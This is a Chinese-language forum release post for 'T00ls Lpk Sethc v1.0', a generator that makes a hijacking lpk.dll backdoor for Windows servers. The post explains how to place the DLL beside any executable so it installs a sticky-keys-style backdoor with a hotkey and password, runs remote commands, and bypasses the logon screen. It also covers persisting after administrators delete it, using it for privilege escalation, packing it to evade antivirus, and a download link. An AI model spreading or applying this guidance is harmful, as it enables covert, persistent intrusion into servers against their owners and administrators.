什么是lpk:
就是一系统dll,位于system32目录下,特点是每个可执行文件运行之前都要加载此dll
而windows系统特性是先判断文件目录是否存在此dll再判断system32目录
由此基于lpk的dll劫持就产生了,本工具只是利用这一特性而扩展编写的!
=======================以上为lpk.dll的一些说明=======================
话不多说上图:
特别说明:
1.说下特点吧,生成出来以后是lpk.dll
将此文件放在服务器任何有exe的目录,比如serv-u,mysql等安装目录
然后运行目录下的任何exe,后门就已经自动替换好了~
2.当然也可以当作辅助提权所用,有可写目录的话都可以网目录里面传下!
这样当管理下次运行此目录下的可执行文件以后,后门也就产生了!同理,就算管理删了你的后门但是你的dll还在,那么管理一运行,就又替换了
3.昨天才写完所以有点粗糙,很多功能也不完善,暂时只支持3个热键呼出,相信热键多了你自己也按不过来 = =!
而这里要填热键代码,压缩包里面我会把热键代码表打包,你要设置哪3个热键,
只需要在txt里面找到那个键对应的值,然后填写到上图的3个编辑框中!
4.热键呼出后当然就是密码了,密码最终是采用的32位md5,只要你密码设置的够难
别人通过system32下载了你的后门也是无济于事!
5.生成器目录下的LPK.DAT即是主文件,可以直接对其进行免杀修改等处理!
6.建议生成时候选上upx压缩,这样出来体积50kb,还没有一个shell大!当然你也可以加别的保护工具!
7.本程序适用于 2K/3K/XP 2008没有测试,有兴趣的可以测试下! win7/vista系统已经不支持劫持lpk,但是可以通过修改注册表达到,但是这样就没有什么意义了!
8.重点说明下,呼出后门的时候3个热键一定要同时按下!比如我设置了A+B+C键呼出,必须ABC同时按,而不是先按下A再按下B这样
由于本程序并非采用注册热键!而是采用的监控键按下的状态,优点是可以任意支配热键,整个键盘你想怎么搭配热键就怎么搭建
缺点如上呼出的时候必须同时按下!
=======================以上为生成以及呼出的一些说明 =======================
后门界面:
除了左上角多了个白框,其他地方是100%的高仿..由于粘滞键自身的窗口样式实在特殊
查了很多资料很多方法都不能模仿完美!
密码界面:
功能界面:
输入要执行的命令直接”RUN”运行,下面会有回显
执行命令:
考虑到某些服务器无法执行cmd命令或者一些其他的原因,所以添加一个功能”直捣黄龙”,按下直接开桌面,再按一下即可隐藏winlogo登陆界面!
想方便的用这个功能也不错!
=======================以上为功能界面的一些说明 =======================
最后还要说下,本程序缺陷之1就是热键,必须同时按下,所以如果发现无法呼出,请多按几次!
当前版本:v1.0
lpk.dll大小(171kb)
lpk.dll使用upx压缩后大小(59kb)
下载地址:
http://b.hkrices.com/T00ls Lpk Sethc v1.0.rar
T00ls Lpk Sethc测试使用视频,http://hkrices.com/lpk.html